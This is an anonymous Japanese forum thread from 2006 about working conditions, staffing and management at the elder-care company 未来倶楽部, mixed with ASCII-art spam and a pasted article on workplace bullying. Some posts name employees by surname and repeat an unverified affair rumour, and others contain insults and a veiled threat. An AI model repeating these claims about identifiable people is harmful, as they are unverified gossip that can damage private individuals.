121 :ななしのフクちゃん:2006/11/20(月) 23:37:48 ID:Q2zgDQO8
>>115さん!
そんなにテイノウ、テイノウ言うのなら書き込み止めれば?
どんなネタや書き込みなら>>115さんのご希望に添えるのでしょう?
>>119さん!
そんなに感情的にならんで。。。
関心ない発言は無視すりゃいいじゃん!
>>120さん!
本当に同感。
どうもここはストレス溜め込みすぎている人が多いらしい。

別にここは、社員でも社員じゃなくても発言OKなわけだし。。。
言いたい事を言って、ストレス解消しよう!ってとこでしょ?
他人を卑下したり、巻き込んで落とし込んだりする必要性はない訳だよね。
ねぇ?そうだよね?


122 :ななしのフクちゃん:2006/11/20(月) 23:47:24 ID:UE7O7YmJ
あーひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃ 
ひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃ 

    アーヒャヒャヒャヒャヒャ 
       ∧⊂ヽ     アーヒャヒャヒャヒャ 
       (゚∀゚)ノ        ∧⊂ヽ 
        |⊃ | アーヒャヒャ   (゚∀゚)ノ 
        |   |   ヒャヒャ   |⊃ | 
      〜ゝ ⊃ ∧∧    |   |    アーヒャヒャヒャヒャ 
   〜/ ̄∪ /( ゚∀゚)⊃ ⊂ .ノ〜.     (゚∀゚ ) 
    ノ ̄ ̄ ̄ヽ/つ     U.       (∩∩) 
    ~~~~~~~~~~ 
あーひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃ 
ひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃ

123 :ななしのフクちゃん:2006/11/20(月) 23:48:04 ID:UE7O7YmJ
      /     \ 
     /  / ̄⌒ ̄\ 
     /   / ⌒  ⌒ |   | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ 
    | /  (・)  (・) |   | てめーなんだよこの糞スレは!! 
  /⌒  (6     つ  |   | てめーは精神障害でもあんのか? 
 (  |  / ___  |  < 何とか言えよゴルァァァァァァ! 
  − \   \_/  /    \__________________ 
 //  ,,r'´⌒ヽ___/     ,ィ 
   /    ヽ       ri/ 彡 
  /   i    ト、   __,,,丿)/        ζ            
 |    !     )`Y'''" ヽ,,/      / ̄ ̄ ̄ ̄\         
  ! l   |   く,,   ,,,ィ'"      /.         \  
  ヽヽ  ゝ    ! ̄!~〜、       /           |     
  ヽ  / ̄""'''⌒ ̄"^'''''ー--、 :::|||||||||||||||||||||||||||||||||    
   Y'´          /    """''''〜--、|||||||||||||||||) Σ 
   (      丿  ,,;;''  ....::::::::::: ::::r''''"" ̄""ヽ   |    
    ゝ   ー--、,,,,,___      ::: ::,,,,,ー`''''''⌒''ーイ  ./       
    ヽ      \  ̄""'''"" ̄   \____/-、 
     ヽ       ヽ  :::::::::::::::::::: /          `ヽ 
      ヽ  丿   )       /    ノ   ゝ ヽ ,〉 
       ゝ      !      /            ∀ 
        !     |      /   人     ヽ   ヽ 
        |     ,;;}      !ー-、/  ヽ _,,,-ー'''''--ヘ 
          |ノ    |      |  /    Y        ヽ 
         {     |      |   j      )  >>1     ヽ

124 :ななしのフクちゃん:2006/11/20(月) 23:48:49 ID:UE7O7YmJ
ここは アンパンをつくっている ぱんこうじょう 

きょうもみんなのわらいごえがきこえてきます 

                               O 
                              o 
                             .,--..., 
                             |'  .| 
                             |  ..| 
                              | ......| 
                            .|  . ..| 
                            |'   .| 
          .,-------------------------,-, ...| 
         /...::::::::::::::::::::::::::::::::::::::::::::::::::::::::::/  \| 
        /..:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::/  =  \ 
       f------------------------+~        `i 
       | ┌-┐        ┌─┐ |   ┌─┐. . | 
       |. ...| .:::.|        └─┘ |   │  │. . | 
       |. ...| .:::.|               |   │  │. . | 

125 :ななしのフクちゃん:2006/11/20(月) 23:49:29 ID:UE7O7YmJ
あーひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃ 

             __ 
            /   \__ 
            |        \__ 
             〉           \ 
             /             〉 
       ___/              / 
      _|  _ ____〈            __/ 
     〈 --/   \  _---_     / 
     /  O    -    \  /__ 
     / ̄\_-----_    O   \  --_ 
    |   /     V ̄ ̄    〈     〉 
   . | __/\__   /        (_  | 
    |      -- |          |/ 
     |  |      \         | 
     \  |--___  _         / 
      \ |__---         / 
       \___          _/ 
          ------------ 

126 :ななしのフクちゃん:2006/11/20(月) 23:50:56 ID:UE7O7YmJ
あーひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃ 

          __----_ 
        __--         \ 
      /   / ̄\      \ 
    / __  |   O       \ 
    / / \     /       | 
   /  |O  _--__ /       | 
   | __ /     V        | 
   |    V      |-__    | 
    |    |_     /       / 
    |    /----   /      / 
    \ /  \__/     / 
     \     \/ _-- 
       --___--- 

127 :ななしのフクちゃん:2006/11/20(月) 23:51:35 ID:UE7O7YmJ
あーひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃ 

        -- ̄ ̄ ̄ ̄--_ 
      _/    _----_  \ 
   / ̄       O   |   \ 
   |             / ̄| | 
   \   |       ○  O  | 
    |    |--_          | 
     |    |   --_      | 
     \   |      ---__ | 
      \   |__-----   〈 
       \_            ) 
         \____-_/ 

128 :ななしのフクちゃん:2006/11/20(月) 23:52:07 ID:UE7O7YmJ
あーひゃひゃひゃひゃひゃひゃひゃひゃひゃ 
           
         _-----== ̄ ̄\ 
      _-- ̄      \    .| 
    /           |    | 
    ./       / ̄\ /   / 
    |  / ̄\    O  |    | 
    \ |O        |    | 
      |    | |      |    | 
      |     ̄ /    .|    | 
      |  \__/     |    | 
        |   \/      |_--- 
         |      _---- 
       L--- ̄ ̄ 

129 :ななしのフクちゃん:2006/11/20(月) 23:52:47 ID:UE7O7YmJ
あーひゃひゃひゃひゃひゃひゃひゃひゃひゃ 
            _ 
          /   〉    _ 
         /   /  /   _〉 
         |  /   /  _-- 
       _- ̄ ̄ ̄ ̄ ---/ 
     / _   _    \ 
     / /    /       | 
     |  |O  | .|  O|    | 
    |    __/  _ /     | 
    |   _-----_       | 
    |   /     |      | 
    〉   |     /      | 
   /  \ ----   /   | 
   |   \___/     | 
   |    \  /      / 
   \    \/       / 
    \           / 
      --____---- 

130 :ななしのフクちゃん:2006/11/20(月) 23:53:36 ID:UE7O7YmJ
あーひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃ 
             ____ 
         ____/   \_ 
        /           \ 
       |             | 
       \          / 
         |          | 
         |          | 
      _  |          |  __ 
        | \_|_------------| ̄ / 
     |\| / / \ /  \ |   ̄| 
     _\ /  O     O |  / 
     | ̄ |              |   ̄| 
     \  |     |⌒|    /  / 
      \|     -    \/ 
       /  \__/    | 
        |    \/     | 
       |            / 
       \        __/ 
         -_____- 


131 :ななしのフクちゃん:2006/11/20(月) 23:54:29 ID:UE7O7YmJ
あーひゃひゃひゃひゃひゃひゃひゃひゃひゃひゃ

             __,,.-‐''''''''''''''''''''ー:-、_ 
          ,,.-'";:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:~`ヽ:、_ 
         ,/;:;:;:;;:-'"~~''ヾ/~~~'''''--、;:;:;;:;:;:;;:\ 
        /;:;:;:-'"            `ヾ;:;:;:;:;:;;ヽ、 
      /;:;:彡                ヾ;:;:;:;:;:;;:ヽ 
     /;;::;:三                  i;:;:ミ;:;:;:;::ヽ 
     ,i";:;:彡         - ''   -  、.  ヾ;:;:;:;:;:;:;:;:;i 
     /;:;;:;彡         ,,...:-'"  ,,,.....   ミ;:;:\;:;:ミ| 
    /;:;:;:;:;:彡    - ' ''""   - ''"      ミ;;;;;;;;ヾ;;;;| 
    i!;:;/;:;:;彡             ,,;;;;;;;!!!!!:、  ヽ、;:;:;:;;::、 
     !i;:;:;:;:;:;:;| ,,;;;!!!!;;;;::::  :::.    '"" _   ノ i  /  | 
     ヾ;:彡/     _ _  :::  :::: ,,.ィゝ-''ヽー ' ヾ/ゝ | 
      !;:;:;:| ゝ_,.-''"ゞ-'ゝ,;:  ::::;:;:;::ー= '"    :::ノ | 
       i、/ ,.-‐>ゝ: : ' "   ::::;:;:;:      : : :;  / 
       :|        ..:/   :::: '⌒ヽ       ;::‐' 
       ゝ、    ..::::: ゝ - 、  ,:-‐-' `ヽ、  ..  :| 
          i   ::::/::    `''''       i::::    | 
         ヽ   !:::: __,,,..::;;;;;;;;;;;::::‐-っー      ,! 
            ヽ  `::: `ーゞL:L:L:Ll.-'~ノ  .::   / 
           \  `  `ー-、二二,.:''   .::  ,ィ" 
      ,,...--;'''"";:ヾ, :..           ,;: / 
   ,..:-'"        ー:、  .....,,,,,,....    ,.::'" ムネヲ 


132 :ななしのフクちゃん:2006/11/20(月) 23:55:05 ID:UE7O7YmJ
こうして ぱんこうじょうからは わらいがたえなかったそうです 

                                O 
                              o 
                             .,--..., 
                             |'  .| 
                             |  ..| 
                              | ......| 
                            .|  . ..| 
                            |'   .| 
          .,-------------------------,-, ...| 
         /...::::::::::::::::::::::::::::::::::::::::::::::::::::::::::/  \| 
        /..:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::/  =  \ 
       f------------------------+~        `i 
       | ┌-┐        ┌─┐ |   ┌─┐. . | 
       |. ...| .:::.|        └─┘ |   │  │. . | 
       |. ...| .:::.|               |   │  │. . | 
        ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄~~ 

                              めでたし めでたし

133 :ななしのフクちゃん:2006/11/20(月) 23:55:55 ID:UE7O7YmJ
□□□□■□□□□□■□□□□□□□□□□□□□□□□□□□□□ 
□□□■■□□□□□■□□□□□□□■■■■■■■■■■■■□□ 
□□■■□□□□□■■■■■■□□□□□□□□□□□□□■■□□ 
□■■□□■□□□■□□□□■□□□□□□□□□□□□■■□□□ 
□□■□■■□□■■■□□■■□□□□□□□□□□□■■□□□□ 
□□□■■□□■■□■■■■□□□□□□□□□□□■■□□□□□ 
□□■■□□□□□□□■■□□□□□□□□□□□■■□□□□□□ 
□□■□□□■□□□■■■■□□□□□□□□□□■□□□□□□□ 
□■■■■■■□□■■□□■■□□□□□□□□□■□□□□□□□ 
□□□□■□□□■■□□□□■■□□□□□□□□■□□□□□□□ 
□□■□■□■□□□□■■□□□□□□□□□□□■□□□□□□□ 
□□■□■□■□□□□□■■□□□□□□□□□□■□□□□□□□ 
□■■□■□■□□□□□□□□□□□□□□□□□■□□□□□□□ 
□■□□■□□□□■■■□□□□□□□□□□□□■□□□□□□□ 
□□□□■□□□□□□■■■□□□□□□□□□□■□□□□□□□ 
□□□□■□□□□□□□□■■□□□□□□■■■■□□□□□□□

134 :ななしのフクちゃん:2006/11/20(月) 23:56:29 ID:UE7O7YmJ
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□ 
□□□■■■□□□□□□■■□□□□■□□□□□■□□■■■■■□ 
□□■□□□■□□□□□■■□□□□■■□□□■■□□■□□□□□ 
□■□□□□□■□□□■□□■□□□■■□□□■■□□■□□□□□ 
□■□□□□□□□□□■□□■□□□■□■□■□■□□■■■■□□ 
□■□□■■■■□□■■■■■■□□■□■□■□■□□■□□□□□ 
□□■□□□■□□□■□□□□■□□■□□■□□■□□■□□□□□ 
□□□■■■□□□□■□□□□■□□■□□□□□■□□■■■■■□ 
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□ 
□□□■■■□□□■□□□□□□■□■■■■■□□■■■■■□□□ 
□□■□□□■□□□■□□□□■□□■□□□□□□■□□□□■□□ 
□■□□□□□■□□■□□□□■□□■□□□□□□■□□□□■□□ 
□■□□□□□■□□□■□□■□□□■■■■□□□■■■■■□□□ 
□■□□□□□■□□□■□□■□□□■□□□□□□■□□□■□□□ 
□□■□□□■□□□□□■■□□□□■□□□□□□■□□□□■□□ 
□□□■■■□□□□□□■■□□□□■■■■■□□■□□□□□■□ 
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□

135 :ななしのフクちゃん:2006/11/21(火) 00:46:54 ID:eNGKlL4r
121さん、そうだね。
どんな悪い施設か話したい人は話せばいいし、どんな良い施設か話したい人は話せばいいのにね。
いちいち人の書き込みにウザイだのテイノウだの書き込んでも何が言いたいんだかわからないね。
ちなみに115と119は同じIDだから、同じ人だよ。

136 :ななしのフクちゃん:2006/11/21(火) 00:53:18 ID:eNGKlL4r
というか、115はウザイだのテイノウだの攻撃的な発言してる人の書き込みを抜粋して、何だかんだ言ってここのスレが気になってしょうがない人って指摘してる書き込みだから115さん自身の発言じゃない。

137 :ななしのフクちゃん:2006/11/21(火) 15:44:50 ID:x8Odwjf5
青葉地区の施設情報お願いします

138 :ななしのフクちゃん:2006/11/21(火) 18:51:29 ID:x8Odwjf5
募集あったので、雰囲気わかればいいなと思ったのですがどなたか知ってる方お願いしますm(__)m

139 :ななしのフクちゃん:2006/11/21(火) 18:56:02 ID:lkvMkC7b
>>138
そういったことは、まず施設訪問を客に扮して行ってみるといいよ。
いいことばかり言うと思うけど、入居者の皆さんの顔を見れば大体わかるよ。
まじめに仕事してきたならね^^

140 :ミスター]:2006/11/22(水) 16:24:31 ID:669Ma9JH
久々の登場です^^ミスター]は、何人居るのかって一人ですよ!! 
府中に居ますよ!!この前はケアーの情報を教えたので厨房の話題に
移りましょう^^木目田っていう調理師が辞めて、また厨房から一人
辞めるんでしょ!!みんな、短いね^^だって府中だけで何人辞めてるの??
早坂、田口、杉田が移動で、武川、小倉、加賀、浪貝、鹿島と8人も代わってる
なんて異常な会社ですよ!!

141 :ミスター]:2006/11/22(水) 16:30:23 ID:669Ma9JH
しかも来年には、新たに8ヶ所の施設をオープンする予定でしょ^^
そんなにオープンさせて人が集まるのか疑問ですよ??
っまこちらには、関係ないけどね!

142 :ミスター]:2006/11/22(水) 17:01:14 ID:669Ma9JH
本社では、こちらが誰かと探しているみたいですが、特定は、不可能のような
きがします!!頑張って私を特定してみてくださいな^^そうそう管理栄養士
の福山って言うのもいたね!!不倫がバレテ退職したって言うけど、考えられ
ないよね!!

143 :ななしのフクちゃん:2006/11/22(水) 19:53:08 ID:gMg74Ta4
実名は・・・・やめようよ・・・
どうしてそんなにムキになってるの?

144 :ななしのフクちゃん:2006/11/22(水) 20:03:40 ID:JWRWZosO
名前出さないで。あなたが誰かはわかっています

145 :ななしのフクちゃん:2006/11/22(水) 22:56:05 ID:6DxdQmMx
ふ〜ん ミスターXは府中に住んでいたんだ
未来倶楽部やめて田舎に帰ったって聞いてたけど

今は何してるか知らないけど未来倶楽部にうらみ持っていろいろカキコしても
戻れないと思うけどね〜

146 :ななしのフクちゃん:2006/11/23(木) 00:35:12 ID:obGKHqyo
ミスターXさん!
実名あげちゃうほど、未来倶楽部のどこかの施設で虐められたの?
でも、もう辞めちゃったんでしょ?
もう、惨めな書き込みはしないほうがいいんじゃないかな。。。
本社が探せなくても、あなたが実名あげ連ねても何も今の状況は変わらないよ。
何故そんなにムキになって実名あげ連ねているの?


147 :ななしのフクちゃん:2006/11/23(木) 21:02:30 ID:A0kpWjnn
各階ごとにリーダーがいるらしいですが、リーダーはどういう基準で選ばれてるのですか?
よければ教えて下さいm(_ _)m

148 :ななしのフクちゃん:2006/11/23(木) 23:22:20 ID:Cnmv0yjK
頭の悪いミスターX。
いい気になるなよ。必ず捕まるから。

149 :ななしのフクちゃん:2006/11/24(金) 08:19:58 ID:RAKPezH0
>>148
もういい加減にしなよ(笑
そうやって、ちょっかい出すから「ミスターX」とかいう人物も
登場したくなるんじゃない?
無視が一番だと思うけどな・・特に2ちゃんではね。

150 :ななしのフクちゃん:2006/11/24(金) 09:32:59 ID:yM1FaT1K
http://www.geocities.com/fuzoku_ou/index.htm

151 :ななしのフクちゃん:2006/11/24(金) 23:03:06 ID:RAKPezH0
↑アクセスするべからず

152 :ななしのフクちゃん:2006/11/24(金) 23:25:30 ID:F1lZzlFD
あの・・
147で質問した者ですが
噂話や暴露話しか取り合ってもらえないんでしょうか(^_^;)

153 :ななしのフクちゃん:2006/11/25(土) 04:27:01 ID:YA78tjmJ
そんなことはないですよ^^;
ただ・・・質問にターゲットを当てたスレではないから、
知らないとか、見ている人が興味ない話題や質問へは書込みがないだけだと思いますよ。
>>147さんがもし、未来倶楽部の職員なら、主任やリーダーに直接聞いてみてもいいでしょう。
もし、社員じゃないなら回答なしはそれも答えを思うしかないでしょうね^^;

154 :ななしのフクちゃん:2006/11/25(土) 21:29:21 ID:228Pk2KQ
ミスターX=浪〇


糸冬 了

155 :ななしのフクちゃん:2006/11/26(日) 07:07:49 ID:EZnyPlz7
俺じゃねーぞ ふざけるな!


156 :ななしのフクちゃん:2006/11/26(日) 12:30:39 ID:AhgvwMEm
支援課について、かなり疑問

人数少ないから応援含めて派遣されているはずなのに、コール持たない
コール対応しない
だからと言って、仕事出来ないから新人に、仕事教える事も出来ない
何の為にいるんですか?無駄な感じ受けるのは、俺だけですか?

仕事出来ないのに、変なことばかり鬼の首を取ったようにつつくのも聞いていて呆れるんですが

詳しい方教えてください

157 :ななしのフクちゃん:2006/11/26(日) 13:50:48 ID:mc6ZlUvk
支援課って飾りだけど 威張ってるよね持ってる 資格の問題だけで脳みそ空だよ。わかんないこと質問攻めにして あ わからないですか?ってやっちまえば?

158 :ななしのフクちゃん:2006/11/26(日) 16:13:13 ID:Ag9Mq90i
156 157 さんへ
147ですが、各階のリーダーはどんな人が選ばれてるのですか?
仕事の出来あしで決められてるのでしょうか?
勤続年数の長い順に決められてるのでしょうか?
ここの社員さんですよね(^_^)
よければ教えて下さいm(_ _)m

159 :ななしのフクちゃん:2006/11/26(日) 16:18:28 ID:AhgvwMEm
>>157
ありがとうございます
支援課がコール持たないで、施★長・副施☆長が持っている状態なので見てて笑えます
>>147
棚の話…スタッフ、少なすぎて各階にいるなんて事ない
仕事もまともに教えてもらえる環境下では無いので、それでも自信あるならどうぞ…
中年スタッフ仕事せず、口ばかりなのも我慢出来るならお勧めします

160 :ななしのフクちゃん:2006/11/26(日) 17:12:05 ID:Ag9Mq90i
147です。
159さん、ありがとうございました。
えっと・・・
せっかく答えて頂いたんですが、意味がちょっと(T_T)
仕事をしないサボリ魔がリーダーに選ばれてるという意味でしょうか(?_?)

161 :ななしのフクちゃん:2006/11/26(日) 17:20:15 ID:Ag9Mq90i
あ!もしかして、勘違いされてるようなので補足させて頂きます!
私はリーダーになりたくて質問してるんじゃないんです(^_^;)
介護の仕事に携わっていないですし。
実は知り合いにリーダーやってた人がいて、私の知る限りでは仕事が出来る人でもなく仕切るタイプでもないので何故にリーダーに選ばれたのか不思議に思い(^_^;)
本人も何故自分がリーダーに選ばれたのかわからないとの事(^_^;)
一体どうやって決められるものなのかと。
そもそもリーダーとはどのような存在ですか(?_?)
たいした意味はない存在なんでしょうか?

162 :ななしのフクちゃん:2006/11/26(日) 17:46:16 ID:AhgvwMEm
>>160
リーダー1人(桜から)移動してきた人のみ
この人が、リーダー?って動きしかしない

前書いたのは
リーダー云々以前の問題って話だよ

俺もシステム詳しくわからないね
周りで、リーダーになった奴いないからな

施設長に聞くのが一番早いんじゃないの?

なんでそんなに
リーダーに、こだわんだかしらんが
ゴマスリは必須科目
否定文は使わない事じゃないの?
仕事出来んのに、ケアのままの人多い
逆言えば
なんで?と、思う奴が上にいる状況考えればそれしかないだろ

163 :ななしのフクちゃん:2006/11/26(日) 17:48:56 ID:AhgvwMEm
↑書き込み中に更新されていたため、内容かみ合わず
すまないm(__)m

164 :ななしのフクちゃん:2006/11/26(日) 19:14:18 ID:Ag9Mq90i
160さん ありがとうございました!
知り合いの所は半年位のペースでリーダー入れ代わるので、どうやら場所によってリーダーの決め方が違うみたいですね(・_・;)
知り合いの所は適当に決めてるみたいだな(^_^;)
ちなみに知り合いは入社1年ちょっとで辞めてます。
向上心ない人だし(笑)
なんかたびたびすみませんでした!
失礼しますm(_ _)m

165 :ななしのフクちゃん:2006/11/26(日) 19:17:14 ID:Ag9Mq90i
間違えました(^_^;)
163さん
ありがとうございましたm(_ _)m

166 :ななしのフクちゃん:2006/11/28(火) 10:14:07 ID:OcCA8ZIv
ここの会社の母体は、以前何をしていた会社なの?



167 :ななしのフクちゃん:2006/11/28(火) 10:50:48 ID:h6Anps0J
また施設長5名募集してたよ!!

168 :ななしのフクちゃん:2006/11/28(火) 11:10:32 ID:LzekVzsH
ある施設は施設☆自ら現場に入り、働いてるよ 管理だけしてればいいのに周りの助けとがんばってるけど現場はかえって面倒。やめてくれ!!

169 :ななしのフクちゃん:2006/11/28(火) 21:43:25 ID:liFicBig
未来ないよね。

170 :ななしのフクちゃん:2006/11/28(火) 21:50:24 ID:OcCA8ZIv
またまた、施設長全交代なのぉ???
未来じゃなくて、ミイラ倶楽部だね〜こりゃぁーー;

171 ::2006/11/29(水) 02:02:58 ID:24X1DCiR
154お前ヤルから

172 :ななしのフクちゃん:2006/11/29(水) 17:25:28 ID:CEusg1bS
施設☆ 全取っ替えでもいいよ。管理をきちんとやれる人。ケア部門には口、手出さないしっかりした人がいいです。CSまがいの行動とらない人。トップなんだから電話だけで指示くらいしろよ!自分が携わるだけいい施設☆と 勘違いしている☆☆施設長。情けない。

173 :ななしのフクちゃん:2006/11/29(水) 22:21:41 ID:ifG6d+To
↑でも、あなたの言うとおりにしていたら
ケア真似やアホ副施設☆にトコトン虐められて、終いには施設管理ができてないって
違うこと言われてた施設☆いたよ〜


174 :ななしのフクちゃん:2006/11/29(水) 22:43:05 ID:w3JixaQ8
>>172みたいなやつは自分の実力が無いのを棚に上げて好き勝手言うんだよ。
どこの施設にも必ずいるでしょ。こんな奴。
影では同僚から煙たがられてるのに気付かず、口ばっかね。

175 :ななしのフクちゃん:2006/11/30(木) 00:24:14 ID:YFgWbnD/
>>174
に、同意

実際
動くと言われているCSには、施設★かなり好評
動かないCSにとっては、施設☆いるから、仕事手を抜けなくて嫌なんじゃねぇの?
仕事しないで、煙草吸いたいだろうし
施設★いるか、いないかで動き変えてる中年CSも、いるからな〜
(副★任含め)
施設★頑張ってください!!支援課より余程支援して頂いてます
支援課!コール持って、コール対応しろよ!
しないなら、邪魔なので本社にお帰りください

176 :ななしのフクちゃん:2006/11/30(木) 00:53:01 ID:4pTG7MbW
□□□□■□□□□□■□□□□□□□□□□□□□□□□□□□□□
□□□■■□□□□□■□□□□□□□■■■■■■■■■■■■□□
□□■■□□□□□■■■■■■□□□□□□□□□□□□□■■□□
□■■□□■□□□■□□□□■□□□□□□□□□□□□■■□□□
□□■□■■□□■■■□□■■□□□□□□□□□□□■■□□□□
□□□■■□□■■□■■■■□□□□□□□□□□□■■□□□□□
□□■■□□□□□□□■■□□□□□□□□□□□■■□□□□□□
□□■□□□■□□□■■■■□□□□□□□□□□■□□□□□□□
□■■■■■■□□■■□□■■□□□□□□□□□■□□□□□□□
□□□□■□□□■■□□□□■■□□□□□□□□■□□□□□□□
□□■□■□■□□□□■■□□□□□□□□□□□■□□□□□□□
□□■□■□■□□□□□■■□□□□□□□□□□■□□□□□□□
□■■□■□■□□□□□□□□□□□□□□□□□■□□□□□□□
□■□□■□□□□■■■□□□□□□□□□□□□■□□□□□□□
□□□□■□□□□□□■■■□□□□□□□□□□■□□□□□□□
□□□□■□□□□□□□□■■□□□□□□■■■■□□□□□□□

177 :ななしのフクちゃん:2006/11/30(木) 00:53:38 ID:4pTG7MbW
□□□□■□□□□□■□□□□□□□□□□□□□□□□□□□□□ 
□□□■■□□□□□■□□□□□□□■■■■■■■■■■■■□□ 
□□■■□□□□□■■■■■■□□□□□□□□□□□□□■■□□ 
□■■□□■□□□■□□□□■□□□□□□□□□□□□■■□□□ 
□□■□■■□□■■■□□■■□□□□□□□□□□□■■□□□□ 
□□□■■□□■■□■■■■□□□□□□□□□□□■■□□□□□ 
□□■■□□□□□□□■■□□□□□□□□□□□■■□□□□□□ 
□□■□□□■□□□■■■■□□□□□□□□□□■□□□□□□□ 
□■■■■■■□□■■□□■■□□□□□□□□□■□□□□□□□ 
□□□□■□□□■■□□□□■■□□□□□□□□■□□□□□□□ 
□□■□■□■□□□□■■□□□□□□□□□□□■□□□□□□□ 
□□■□■□■□□□□□■■□□□□□□□□□□■□□□□□□□ 
□■■□■□■□□□□□□□□□□□□□□□□□■□□□□□□□ 
□■□□■□□□□■■■□□□□□□□□□□□□■□□□□□□□ 
□□□□■□□□□□□■■■□□□□□□□□□□■□□□□□□□ 
□□□□■□□□□□□□□■■□□□□□□■■■■□□□□□□□

178 :ななしのフクちゃん:2006/11/30(木) 03:37:41 ID:YUHwpGk3
自作自演?(笑 施設☆自ら?(笑 あらら…最悪(笑 まっ好きにしなって(笑

179 :ななしのフクちゃん:2006/11/30(木) 10:00:19 ID:5fpVsWxF
>>178
それって違うと思うよ。>>174>>175みたいに感じている人もスタッフにはいるってことでしょう?

せっかく人と接する仕事しているんだから、視野をもっと広くもったらどうかな?
嫌味を言ったりするだけじゃなく、何故自作自演って思ったのか!はっきり
書込みすればいいじゃん。



180 :ななしのフクちゃん:2006/11/30(木) 21:05:08 ID:YFgWbnD/
>>178みたいなのは、誉め言葉は自作自演だと思ってんじゃないの?
自分が、誉められる事ないからさ…
可哀相w(゚o゚)w

181 :ななしのフクちゃん:2006/11/30(木) 22:38:22 ID:YUHwpGk3
はいはい↑ありがとさん(笑 ほんと馬鹿ばっかだな(笑

182 :ななしのフクちゃん:2006/11/30(木) 23:05:41 ID:DETQpDVQ
>>181さん。いちいち必死だな(笑 イジメられて恨みでもあんの?(笑
頑張って2ちゃんねるで上層部イジメてよ 応援してるよ(笑←ププ

183 :ななしのフクちゃん:2006/12/01(金) 01:19:57 ID:vZ28CanV
基本給22万で賞与年間3ヶ月。これで年収約350万。 
あとは夜勤や残業で稼げば良い。 
これだと贅沢しなければ夫婦で暮らしていける金額になるのでは? 
環境面では、休みをきっちり取れるシステムを作って欲しい。 
ミ−ティングや家族レタ−の為にわざわざ休みの日に拠点に行きたくは無い。 
Ev・Mo・食事時間の忙しい時間帯専用の派遣社員の登用も考慮して欲しい。 
あと、夜勤終わったあとに朝食が出たりすると嬉しいが、これは贅沢?

184 :ななしのフクちゃん:2006/12/01(金) 04:43:40 ID:5r8eCDDb
>>183
どこの会社の事いってるの?
ツッコミどころ満載なんでつが

185 :ななしのフクちゃん:2006/12/01(金) 21:21:30 ID:1CSjoW5g
>>183
夢でもみたのかな?
夏の五マン(手取り)って、三ヶ月分だったんだ
冬は、いくらくれんだ?十マンなさげ

186 :ななしのフクちゃん:2006/12/01(金) 22:17:12 ID:fD2igkpi
基本給から差し引かれたぶんが 賞与じゃないかな この季節になると病院だったりのほうが まだ貰えるから考えちゃうよ

187 :ななしのフクちゃん:2006/12/01(金) 23:35:46 ID:fD2igkpi
あと一週間でボーナスでるよー

188 :勝山:2006/12/02(土) 13:46:01 ID:oADXWLvA
世の中の最底辺に住む人生の敗残者諸君よ 
このスレのなかだけがキミたちの生きてい 
ける場所だ 
エバルもよし、自慢するもヨシ 
所詮世間では相手にされないのだからな 
一生そうしていなさい 
サラバだ

189 :ななしのフクちゃん:2006/12/02(土) 14:14:59 ID:tLyUDWOj
ばいば〜い(笑

190 :ななしのフクちゃん:2006/12/02(土) 15:34:05 ID:oADXWLvA
::::::::::;、 /!゙、', ! ! ..:;'!:,' |::;'.r''",rl!、゙゙ヽ,l!';:l:::: :;':.::::゙/7'ト、:.::: .    l ! 
、;;r'",、':::! ,゙、 ';:';:::l l! l:;' ' ./!  j!   ',!::;:/:;/ / .l:::/,'::..:::    !' 
  /:::::j ゙ヽ、,ゝ'、| l.  '  lri;、r/     ゙ツ''" ',、"'';':://':;'::: / . j' 
/:::::::ツ   { r'、    ,,';;;ン'          / .;! }!'./:/::.,r': .:::/ 
゙'ヾ;/    ゙、'、ヽ     ゙''''        /'r/ " '/:/::;/,r'  えっ!? 
.,/        :ヽ、、,              , l;ツ  ,,',-''":;/'" 
"         ::::l:::::::\           ''゙ ` ゙ / ノ‐''"    190ゲットですって? 
       ..:::::l:::::::::::/゙' 、     σ       ,''" 
   ...::::::::::::::ノ::::::::::/   ゙ヽ、,      ,,.、r'        まぁ・・・ 
..:::::::::::::::::;.r‐ ''''''''''‐、,     ゙'ァ‐‐ '''"" i'     
:::::::::::::::, '        ヽ,    /:::::::::::: ! {       
;:::::::::::         ゙l'、、  { 、;:::::::::. ゙、.', 

191 :ななしのフクちゃん:2006/12/02(土) 20:10:09 ID:xZ+J8M3U
なんだか変なカキコミふえたねー

192 :ななしのフクちゃん:2006/12/02(土) 23:37:16 ID:n7BnxwCv
http://headlines.yahoo.co.jp/hl?a=20061202-00000054-mai-soci

<いじめ>「大人」の職場でも深刻 労働相談の2割近くに

「大人のいじめ」もまん延してます――。
日本労働弁護団(宮里邦雄会長)の実施する労働相談で、職場でのいじめに関する相談件数が全体の2割近くを占め続けている。
内容も言葉のいじめから直接的な暴力まであり、弁護団は「子どものいじめ自殺が相次ぐ中、『子は親を映す鏡』というが、長時間労働などが職場にギスギスした雰囲気を生み、いじめにつながっているのでは」と分析。
「14年間の相談活動の中で経験したことのない異常事態」と指摘している。
弁護団によると、年間約2000件寄せられる相談のうち、いじめに関する相談の割合は04年に8%で、不払い残業(30%)や解雇(14.9%)などと比べて相談は少なかった。
それが05年には17.7%と2倍以上に増加。06年も17.2%と高水準のままだ。
これに伴って労災の相談では、従来のけがなどから「うつ病」の相談がほとんどを占めるようになった。
20代のシステムエンジニアの男性の事例では、システムの完成が進まないことから「再教育」の名目で仕事と関係のない研修を受けさせられ、ひざげりなどの暴力を受けるようになり、うつ病となった。
また、経理職だった女性は営業に回された上、けんしょう炎になるまで古い伝票を破る作業を延々とやらされたという。
技術の未熟な若者や動きの鈍い人などが狙われるらしい。
